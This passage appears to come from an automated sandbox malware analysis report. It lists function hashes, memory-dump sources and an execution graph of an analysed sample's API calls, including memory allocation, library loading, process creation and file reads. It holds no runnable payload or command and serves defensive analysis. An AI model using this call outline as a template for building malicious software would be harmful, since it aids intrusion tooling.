                                                • Opcode ID: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                • Instruction ID: 40b3460f1412fcfbe0859865fd3261060f475b4beb1a83648fdfd2b20426102e
                                                • Opcode Fuzzy Hash: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                • Instruction Fuzzy Hash: 16315671E00219AFCF29DFA8E848A9DBBF0FB58724F20416AE522B7380DB355901CF54
                                                Function 011259C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                • Instruction ID: c8721a933ebfade0a1a10d58c2c741a304bf0aee989c86ea5f92fbe57aad7b54
                                                • Opcode Fuzzy Hash: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                • Instruction Fuzzy Hash: CD329C70D0426ADFDB69DF68C884BEDBBB5BF08304F0081E9D549A7281E7749A94CF91
                                                Function 01167D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction ID: 18448e034cf2adb590f5c04ac2b0a9ec6978416bf7b19a4720412bea6a87b82b
                                                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction Fuzzy Hash: 1F91EA71E002169FDF2CDF6DC880ABEBBA9EF44728F14455AE961E72C0D7368960C752
                                                Function 0113D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Bl$l
                                                • API String ID: 3446177414-208461968
                                                • Opcode ID: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                • Instruction ID: b1fa001f40a4836feb827fe0c9561b4f7f275e2f30b9a33e85191523155cb5e2
                                                • Opcode Fuzzy Hash: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                • Instruction Fuzzy Hash: 57A1F470A003298BEF39DB98E890BEDB7B5BB84704F4540E9D90967649CB74AEC4CF51
                                                Function 01165DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 01165E34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                • Instruction ID: a24f2c32d1231f0ea3efd295b11bf1194a26fedd06aa54f94d9490656e6b6fb7
                                                • Opcode Fuzzy Hash: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                • Instruction Fuzzy Hash: B6517871B1C202E6DB6DB61CD9053796F9DAB00790F10C968E0D6C6299EB3784B5874B
                                                Function 01154C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                • Instruction ID: 58b57e476f8c99679cb18f05f5ba7aa75b7dd15aa059e2006cc53edd52547216
                                                • Opcode Fuzzy Hash: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                • Instruction Fuzzy Hash: DA51AEB1E00208CFDF6ACFA9C4886ADFBF4FF54354F15802AD4299B651EB719981CB80
                                                Function 0114D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 0114D959
                                                  • Part of subcall function 01124859: RtlDebugPrintTimes.NTDLL ref: 011248F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                • Instruction ID: 46b7f513879388b5c23f774fff998f194c8c7b17eaf4997bb01a722e9fec448e
                                                • Opcode Fuzzy Hash: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                • Instruction Fuzzy Hash: DE51F371E003469FEF2DDFE8E4887ADBBB2BF64B18F144059D5056B285DB70A945CB80
                                                Function 0119FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                • Instruction ID: 62b650e1ecb5f85f0f1018edc3a7cd3503af8c20e34e6e9453abcf665463ece6
                                                • Opcode Fuzzy Hash: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                • Instruction Fuzzy Hash: B341BF75E0021AABDF1ADF99D884AEEBFB5FF48714F150019E920A7341C7709942CB90
                                                Function 0111DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                • Opcode ID: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                • Instruction ID: d32f5d0d6553264fe2e6a66849e14fcf1450f8b62f9e4ca70320c8880b6f9660
                                                • Opcode Fuzzy Hash: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                • Instruction Fuzzy Hash: E6417CB16087069FC715CF68D484A1ABBE4BF88718F04493EF988DB345D771EA06CB96

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:4.3%
                                                Signature Coverage:1.6%
                                                Total number of Nodes:445
                                                Total number of Limit Nodes:68
                                                execution_graph 97672 2ce328c 97677 2ce79b0 97672->97677 97675 2ce32b1 97678 2ce329c 97677->97678 97679 2ce79ca 97677->97679 97678->97675 97683 2cf8250 97678->97683 97686 2cf7940 97679->97686 97682 2cf8250 NtClose 97682->97678 97684 2cf826a 97683->97684 97685 2cf827b NtClose 97684->97685 97685->97675 97687 2cf795a 97686->97687 97690 35935c0 LdrInitializeThunk 97687->97690 97688 2ce7a9a 97688->97682 97690->97688 97691 3592ad0 LdrInitializeThunk 97692 2cdb680 97695 2cfa0c0 97692->97695 97694 2cdccf1 97698 2cf83b0 97695->97698 97697 2cfa0f1 97697->97694 97699 2cf843d 97698->97699 97700 2cf83d7 97698->97700 97701 2cf8453 NtAllocateVirtualMemory 97699->97701 97700->97697 97701->97697 97702 2cd9780 97704 2cd9ba2 97702->97704 97703 2cda168 97704->97703 97706 2cf9de0 97704->97706 97707 2cf9e06 97706->97707 97712 2cd40a0 97707->97712 97709 2cf9e12 97710 2cf9e40 97709->97710 97715 2cf4840 97709->97715 97710->97703 97719 2ce3390 97712->97719 97714 2cd40ad 97714->97709 97716 2cf489a 97715->97716 97718 2cf48a7 97716->97718 97743 2ce1850 97716->97743 97718->97710 97720 2ce33a7 97719->97720 97722 2ce33c0 97720->97722 97723 2cf8cb0 97720->97723 97722->97714 97725 2cf8cc8 97723->97725 97724 2cf8cec 97724->97722 97725->97724 97730 2cf78a0 97725->97730 97731 2cf78ba 97730->97731 97737 3592c0a 97731->97737 97732 2cf78e6 97734 2cfa150 97732->97734 97740 2cf85c0 97734->97740 97736 2cf8d5a 97736->97722 97738 3592c1f LdrInitializeThunk 97737->97738 97739 3592c11 97737->97739 97738->97732 97739->97732 97741 2cf85da 97740->97741 97742 2cf85eb RtlFreeHeap 97741->97742 97742->97736 97744 2ce1888 97743->97744 97759 2ce7ac0 97744->97759 97746 2ce1890 97757 2ce1b42 97746->97757 97770 2cfa230 97746->97770 97748 2ce18a6 97749 2cfa230 RtlAllocateHeap 97748->97749 97750 2ce18b7 97749->97750 97751 2cfa230 RtlAllocateHeap 97750->97751 97753 2ce18c8 97751->97753 97758 2ce1950 97753->97758 97781 2ce68e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97753->97781 97755 2ce1b02 97777 2cf6f60 97755->97777 97757->97718 97773 2ce4660 97758->97773 97760 2ce7aec 97759->97760 97761 2ce79b0 2 API calls 97760->97761 97762 2ce7b0f 97761->97762 97763 2ce7b19 97762->97763 97764 2ce7b31 97762->97764 97766 2ce7b24 97763->97766 97767 2cf8250 NtClose 97763->97767 97765 2ce7b4d 97764->97765 97768 2cf8250 NtClose 97764->97768 97765->97746 97766->97746 97767->97766 97769 2ce7b43 97768->97769 97769->97746 97782 2cf8570 97770->97782 97772 2cfa24b 97772->97748 97774 2ce4684 97773->97774 97775 2ce468b 97774->97775 97776 2ce46c0 LdrLoadDll 97774->97776 97775->97755 97776->97775 97779 2cf6fba 97777->97779 97778 2cf6fc7 97778->97757 97779->97778 97785 2ce1b60 97779->97785 97781->97758 97783 2cf858a 97782->97783 97784 2cf859b RtlAllocateHeap 97783->97784 97784->97772 97803 2ce7d90 97785->97803 97787 2ce2065 97787->97778 97788 2ce1b80 97788->97787 97807 2cf09f0 97788->97807 97791 2ce1d65 97814 2cfb230 97791->97814 97793 2ce1d81 97819 2cfb360 97793->97819 97795 2ce1bde 97795->97787 97810 2cf6ed0 97795->97810 97797 2ce1d96 97799 2ce1dc1 97797->97799 97825 2ce0810 97797->97825 97799->97787 97801 2ce0810 LdrInitializeThunk 97799->97801 97828 2ce7d30 97799->97828 97800 2ce7d30 LdrInitializeThunk 97802 2ce1eef 97800->97802 97801->97799 97802->97799 97802->97800 97804 2ce7d9d 97803->97804 97805 2ce7dbe SetErrorMode 97804->97805 97806 2ce7dc5 97804->97806 97805->97806 97806->97788 97808 2cfa0c0 NtAllocateVirtualMemory 97807->97808 97809 2cf0a11 97807->97809 97808->97809 97809->97795 97812 2cf6f2a 97810->97812 97811 2cf6f3f 97811->97791 97812->97811 97832 2ce2080 97812->97832 97815 2cfb246 97814->97815 97816 2cfb240 97814->97816 97817 2cfa230 RtlAllocateHeap 97815->97817 97816->97793 97818 2cfb26c 97817->97818 97818->97793 97820 2cfb2d0 97819->97820 97821 2cfa230 RtlAllocateHeap 97820->97821 97824 2cfb32d 97820->97824 97822 2cfb30a 97821->97822 97823 2cfa150 RtlFreeHeap 97822->97823 97823->97824 97824->97797 97826 2ce0832 97825->97826 97837 2cf84d0 97825->97837 97826->97802 97829 2ce7d43 97828->97829 97842 2cf77b0 97829->97842 97831 2ce7d6e 97831->97799 97833 2ce2065 97832->97833 97835 2ce1f72 97832->97835 97833->97811 97834 2ce7d30 LdrInitializeThunk 97834->97835 97835->97833 97835->97834 97836 2ce0810 LdrInitializeThunk 97835->97836 97836->97835 97838 2cf84ea 97837->97838 97841 3592c70 LdrInitializeThunk 97838->97841 97839 2cf8512 97839->97826 97841->97839 97843 2cf7823 97842->97843 97844 2cf77d4 97842->97844 97847 3592dd0 LdrInitializeThunk 97843->97847 97844->97831 97845 2cf7848 97845->97831 97847->97845 97848 2ce7000 97849 2ce701c 97848->97849 97850 2ce706f 97848->97850 97849->97850 97851 2cf8250 NtClose 97849->97851 97852 2ce7192 97850->97852 97859 2ce6410 NtClose LdrInitializeThunk LdrInitializeThunk 97850->97859 97853 2ce7037 97851->97853 97858 2ce6410 NtClose LdrInitializeThunk LdrInitializeThunk 97853->97858 97855 2ce716f 97855->97852 97860 2ce65e0 NtClose LdrInitializeThunk LdrInitializeThunk 97855->97860 97858->97850 97859->97855 97860->97852 97861 2ce71c0 97862 2ce71d8 97861->97862 97864 2ce7232 97861->97864 97862->97864 97865 2ceadd0 97862->97865 97866 2ceadf6 97865->97866 97867 2ceb015 97866->97867 97892 2cf8650 97866->97892 97867->97864 97869 2ceae6c 97869->97867 97870 2cfb360 2 API calls 97869->97870 97871 2ceae88 97870->97871 97871->97867 97872 2ceaf59 97871->97872 97873 2cf78a0 LdrInitializeThunk 97871->97873 97874 2ce5890 LdrInitializeThunk 97872->97874 97876 2ceaf78 97872->97876 97875 2ceaee4 97873->97875 97874->97876 97875->97872 97878 2ceaeed 97875->97878 97880 2ceaffd 97876->97880 97898 2cf7470 97876->97898 97877 2ceaf41 97881 2ce7d30 LdrInitializeThunk 97877->97881 97878->97867 97878->97877 97879 2ceaf1f 97878->97879 97895 2ce5890 97878->97895 97913 2cf3a40 LdrInitializeThunk 97879->97913 97882 2ce7d30 LdrInitializeThunk 97880->97882 97886 2ceaf4f 97881->97886 97887 2ceb00b 97882->97887 97886->97864 97887->97864 97888 2ceafd4 97903 2cf7510 97888->97903 97890 2ceafee 97908 2cf7650 97890->97908 97893 2cf866a 97892->97893 97894 2cf867b CreateProcessInternalW 97893->97894 97894->97869 97896 2ce58ce 97895->97896 97914 2cf7a60 97895->97914 97896->97879 97899 2cf7497 97898->97899 97900 2cf74e5 97898->97900 97899->97888 97920 35939b0 LdrInitializeThunk 97900->97920 97901 2cf750a 97901->97888 97904 2cf7582 97903->97904 97906 2cf7534 97903->97906 97921 3594340 LdrInitializeThunk 97904->97921 97905 2cf75a7 97905->97890 97906->97890 97909 2cf76c2 97908->97909 97911 2cf7674 97908->97911 97922 3592fb0 LdrInitializeThunk 97909->97922 97910 2cf76e7 97910->97880 97911->97880 97913->97877 97915 2cf7b02 97914->97915 97917 2cf7a84 97914->97917 97919 3592d10 LdrInitializeThunk 97915->97919 97916 2cf7b47 97916->97896 97917->97896 97919->97916 97920->97901 97921->97905 97922->97910 97923 2cf80c0 97924 2cf815f 97923->97924 97926 2cf80e7 97923->97926 97925 2cf8175 NtReadFile 97924->97925 97927 2cf4a00 97928 2cf4a5a 97927->97928 97930 2cf4a67 97928->97930 97931 2ce7240 97928->97931 97932 2ce721f 97931->97932 97933 2ceadd0 9 API calls 97932->97933 97934 2ce7232 97932->97934 97933->97934 97934->97930 97935 2cf5200 97936 2cf525a 97935->97936 97938 2cf5267 97936->97938 97939 2cf2da0 97936->97939 97940 2cfa0c0 NtAllocateVirtualMemory 97939->97940 97941 2cf2de1 97940->97941 97942 2ce4660 LdrLoadDll 97941->97942 97945 2cf2ed0 97941->97945 97944 2cf2e27 97942->97944 97943 2cf2e56 Sleep 97943->97944 97944->97943 97944->97945 97945->97938 97946 2cea8d0 97951 2cea600 97946->97951 97948 2cea8dd 97965 2cea2a0 97948->97965 97950 2cea8f9 97952 2cea625 97951->97952 97976 2ce7f80 97952->97976 97955 2cea762 97955->97948 97957 2cea779 97957->97948 97958 2cea770 97958->97957 97960 2cea861 97958->97960 97991 2ce9d00 97958->97991 97961 2cea8b9 97960->97961 98000 2cea060 97960->98000 97963 2cfa150 RtlFreeHeap 97961->97963 97964 2cea8c0 97963->97964 97964->97948 97966 2cea2b6 97965->97966 97973 2cea2c1 97965->97973 97967 2cfa230 RtlAllocateHeap 97966->97967 97966->97973 97967->97973 97968 2cea2d7 97968->97950 97969 2ce7f80 GetFileAttributesW 97969->97973 97970 2cea5ce 97971 2cea5e7 97970->97971 97972 2cfa150 RtlFreeHeap 97970->97972 97971->97950 97972->97971 97973->97968 97973->97969 97973->97970 97974 2ce9d00 RtlFreeHeap 97973->97974 97975 2cea060 RtlFreeHeap 97973->97975 97974->97973 97975->97973 97977 2ce7fa1 97976->97977 97978 2ce7fb3 97977->97978 97979 2ce7fa8 GetFileAttributesW 97977->97979 97978->97955 97980 2cf2680 97978->97980 97979->97978 97981 2cf268e 97980->97981 97982 2cf2695 97980->97982 97981->97958 97983 2ce4660 LdrLoadDll 97982->97983 97984 2cf26ca 97983->97984 97985 2cf26d9 97984->97985 98004 2cf2150 LdrLoadDll 97984->98004 97987 2cfa230 RtlAllocateHeap 97985->97987 97990 2cf2871 97985->97990 97989 2cf26f2 97987->97989 97988 2cfa150 RtlFreeHeap 97988->97990 97989->97988 97989->97990 97990->97958 97992 2ce9d26 97991->97992 98005 2ced540 97992->98005 97994 2ce9d8d 97996 2ce9f10 97994->97996 97997 2ce9dab 97994->97997 97995 2ce9ef5 97995->97958 97996->97995 97998 2ce9bc0 RtlFreeHeap 97996->97998 97997->97995 98010 2ce9bc0 97997->98010 97998->97996 98001 2cea086 98000->98001 98002 2ced540 RtlFreeHeap 98001->98002 98003 2cea102 98002->98003 98003->97960 98004->97985 98007 2ced556 98005->98007 98006 2ced563 98006->97994 98007->98006 98008 2cfa150 RtlFreeHeap 98007->98008 98009 2ced59c 98008->98009 98009->97994 98011 2ce9bd6 98010->98011 98014 2ced5b0 98011->98014 98013 2ce9cdc 98013->97997 98015 2ced5d4 98014->98015 98016 2ced66c 98015->98016 98017 2cfa150 RtlFreeHeap 98015->98017 98016->98013 98017->98016 98018 2cef150 98019 2cef1b4 98018->98019 98047 2ce6180 98019->98047 98021 2cef2e4 98022 2cef2dd 98022->98021 98054 2ce6290 98022->98054 98024 2cef483 98025 2cef360 98025->98024 98026 2cef492 98025->98026 98058 2ceef30 98025->98058 98027 2cf8250 NtClose 98026->98027 98029 2cef49c 98027->98029 98030 2cef395 98030->98026 98031 2cef3a0 98030->98031 98032 2cfa230 RtlAllocateHeap 98031->98032 98033 2cef3c9 98032->98033 98034 2cef3e8 98033->98034 98035 2cef3d2 98033->98035 98067 2ceee20 CoInitialize 98034->98067 98036 2cf8250 NtClose 98035->98036 98038 2cef3dc 98036->98038 98039 2cef3f6 98069 2cf7d10 98039->98069 98041 2cef472 98042 2cf8250 NtClose 98041->98042 98043 2cef47c 98042->98043 98044 2cfa150 RtlFreeHeap 98043->98044 98044->98024 98045 2cef414 98045->98041 98046 2cf7d10 LdrInitializeThunk 98045->98046 98046->98045 98048 2ce61b3 98047->98048 98049 2ce61d7 98048->98049 98073 2cf7dc0 98048->98073 98049->98022 98051 2ce61fa 98051->98049 98052 2cf8250 NtClose 98051->98052 98053 2ce627a 98052->98053 98053->98022 98055 2ce62b5 98054->98055 98078 2cf7ba0 98055->98078 98059 2ceef4c 98058->98059 98060 2ce4660 LdrLoadDll 98059->98060 98062 2ceef6a 98060->98062 98061 2ceef73 98061->98030 98062->98061 98063 2ce4660 LdrLoadDll 98062->98063 98064 2cef03e 98063->98064 98065 2ce4660 LdrLoadDll 98064->98065 98066 2cef098 98064->98066 98065->98066 98066->98030 98068 2ceee85 98067->98068 98068->98039 98070 2cf7d2d 98069->98070 98083 3592ba0 LdrInitializeThunk 98070->98083 98071 2cf7d5d 98071->98045 98074 2cf7dda 98073->98074 98077 3592ca0 LdrInitializeThunk 98074->98077 98075 2cf7e06 98075->98051 98077->98075 98079 2cf7bba 98078->98079 98082 3592c60 LdrInitializeThunk 98079->98082 98080 2ce6329 98080->98025 98082->98080 98083->98071 98084 2ce0d10 98085 2ce0d25 98084->98085 98086 2ce4660 LdrLoadDll 98085->98086 98087 2ce0d48 98086->98087 98088 2ce0d8d 98087->98088 98089 2ce0d7e PostThreadMessageW 98087->98089 98089->98088 98090 2ce5910 98091 2ce7d30 LdrInitializeThunk 98090->98091 98092 2ce5940 98091->98092 98094 2ce596c 98092->98094 98095 2ce7cb0 98092->98095 98096 2ce7cf4 98095->98096 98097 2ce7d15 98096->98097 98102 2cf75b0 98096->98102 98097->98092 98099 2ce7d05 98100 2ce7d21 98099->98100 98101 2cf8250 NtClose 98099->98101 98100->98092 98101->98097 98103 2cf7625 98102->98103 98105 2cf75d7 98102->98105 98107 3594650 LdrInitializeThunk 98103->98107 98104 2cf764a 98104->98099 98105->98099 98107->98104 98108 2cfb290 98109 2cfa150 RtlFreeHeap 98108->98109 98110 2cfb2a5 98109->98110 98111 2cf7850 98112 2cf786a 98111->98112 98115 3592df0 LdrInitializeThunk 98112->98115 98113 2cf7892 98115->98113 98121 2ce97eb 98122 2ce97fa 98121->98122 98123 2ce9801 98122->98123 98124 2cfa150 RtlFreeHeap 98122->98124 98124->98123 98126 2ce83e2 98127 2ce83d2 98126->98127 98127->98126 98128 2ce843b 98127->98128 98130 2ce6e50 LdrInitializeThunk LdrInitializeThunk 98127->98130 98130->98127 98131 2ce59a0 98132 2ce59d6 98131->98132 98133 2cf78a0 LdrInitializeThunk 98131->98133 98136 2cf82f0 98132->98136 98133->98132 98135 2ce59eb 98137 2cf8374 98136->98137 98139 2cf8314 98136->98139 98141 3592e80 LdrInitializeThunk 98137->98141 98138 2cf83a5 98138->98135 98139->98135 98141->98138 98152 2cf1020 98153 2cf103c 98152->98153 98154 2cf1078 98153->98154 98155 2cf1064 98153->98155 98157 2cf8250 NtClose 98154->98157 98156 2cf8250 NtClose 98155->98156 98158 2cf106d 98156->98158 98159 